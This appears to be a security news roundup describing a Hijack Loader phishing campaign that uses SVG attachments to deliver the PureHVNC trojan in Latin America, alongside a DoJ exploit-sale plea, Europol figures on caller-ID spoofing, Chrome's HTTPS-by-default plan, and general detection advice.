Hijack Loader expanded its reach in Latin America this month, delivering PureHVNC via malicious SVG attachments and targeted phishing campaigns that impersonate judicial or government documents.
The campaign observed by IBM X-Force used SVG files that tricked Spanish-speaking recipients into downloading a file that initiated a staged loader and, ultimately, the PureHVNC remote-access trojan. IBM X-Force said the activity ran between August and October 2025 and marked the loader’s first observed targeting of the region.
The infection chain began with social engineering and an SVG attachment that served as the initial vector; the file triggered a small loader binary (Hijack Loader) which then downloaded additional modules and the PureHVNC RAT. The Hacker News summarizes the campaign and links the IBM X-Force analysis.
The U.S. Department of Justice disclosed a separate supply-chain risk this week: a former defense-contractor employee pleaded guilty to selling restricted cyber tools and exploit components to an alleged broker for cryptocurrency. DoJ filings say the material included multiple sensitive exploit components intended for government use.
The human element remains central. Europol estimates that caller-ID spoofing underpins roughly €850 million in annual losses worldwide and calls for coordinated action by providers and law enforcement to reduce the technique’s role in fraud and social engineering. Europol
The browser and web ecosystem are responding in kind: Google has published its plan to push Chrome toward HTTPS-by-default to reduce downgrade and interception risks. Google Security Blog
The immediate detection priorities are clear: monitor for SVGs and other document attachments arriving from external senders; flag unusual parent child process activity following document opens; and watch for unexpected outbound connections from user workstations. In addition, insider-risk teams should correlate anomalous cryptocurrency transactions with privileged roles that have access to sensitive tooling.
Further technical follow-up should focus on acquiring any available sample SVG and Hijack Loader artifacts for static and dynamic analysis. Because loaders often vary by campaign, reversing the exact download-and-execute chain and enumerating command-and-control endpoints will yield the IOCs needed for enterprise detection and YARA rule development.
So far, Cyberwarzone’s coverage of related supply-chain and loader incidents provides context for these trends; see our reporting on large-scale phishing operations at Phishing Campaign Targets Travel Websites and on registry-based threats at PhantomRaven Malware Found in 126 npm Packages.
The summary underscores an enduring fact: social engineering plus staged loaders remain one of the most reliable attack patterns. “Caller ID spoofing drives financial fraud and enables social engineering scams,” Europol wrote. Europol